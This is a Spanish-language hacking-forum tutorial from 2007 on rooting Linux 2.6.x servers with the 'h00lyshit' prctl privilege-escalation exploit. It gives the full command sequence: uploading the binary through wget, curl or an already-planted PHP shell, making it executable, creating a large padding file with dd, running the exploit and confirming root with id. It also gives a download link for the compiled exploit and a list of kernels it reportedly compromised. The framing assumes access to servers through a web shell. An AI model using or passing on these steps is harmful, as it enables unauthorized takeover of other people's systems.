Вы находитесь на странице: 1из 2

Como muchos me dijeron que no sabian bien rootear con ese exploit les ago aki un tutorial h00lyshit

es un exploit que afecta a los kernels 2.6.x con el bug de prctl que afecta asta julio del 2006. Este exploit para ser ejecutado, necesita ejecutarse con un archivo pesado ... El archivo pesado cuanto mas pese mejor, pero muchas veces te rootea asta con uno de 13 MB, lo suyo seria ejecutarlo con uno de 80 a 130MB. Bien, primero subimos el exploit al servidor, ya sea con el comando wget, curl, lynx o por la misma shell php. Una vez subido le damos permisos de ejecucion:: chmod +x h00lyshit ahora para crear un archivo (ka0x.dat) mismamente de 130 MB ejecutariamos: dd if=/dev/zero of=ka0x.dat bs=1024k count=130 Hay veremos que no sale algo parecido: 130+0 records in 130+0 records out para ver lo k pesa el archivo, ejecutamos: du -h ka0x.dat bien ahora damos permisos 777 al archivo ka0x.dat: chmod 777 ka0x.dat y ejecutamos el h00lyshit con ka0x.dat de la siguiente manera: ./h00lyshit ka0x.dat si el exploit falla y el server no es vulnerable, nos saldra: preparing triying to exploit ka0x.dat failed: Exec format error si hace efecto y el kernel es vulnerable, solo saldra esto: preparing triying to exploit ka0xdat ejecutamos: id y ploP! uid=0(root) ya tenemos privilejios root, ahora agan lo que kieran El h00lyshit compilado lo pueden descargar de aqui: http://www2.binaryshadow.org:81/~w00t/my/h00lyshit Imagen de ejemplo:

KERNELS ROOTEADOS CON ESTE EXPLOIT: 2.6.11.4-21.7-default #1 Thu Jun 2 14:23:14 UTC 2005 i686 i686 i386 GNU/Linux 2.6.5-7.151-default #1 Fri Mar 18 11:31:21 UTC 2005 i686 i686 i386 GNU/Linux 2.6.8-2-686 #1 Tue Aug 16 13:22:48 UTC 2005 i686 GNU/Linux 2.6.10-6-686-smp #1 SMP Fri Nov 18 13:20:29 UTC 2005 i686 GNU/Linux 2.6.12.4 #2 Wed Aug 10 12:16:00 CEST 2005 i686 i686 i386 GNU/Linux 2.6.8-2-386 #1 Tue Aug 16 12:46:35 UTC 2005 i686 Linux 2.6.8-2-386 #1 Tue Aug 16 12:46:35 UTC 2005 i686 Linux 2.6.11 #8 SMP Sun Mar 20 21:09:51 CET 2005 i686 GNU/Linux Espero que les aya gustado # ka0x # D.O.M TEAM # 26-3-2007 # foro.zerohack.net

Вам также может понравиться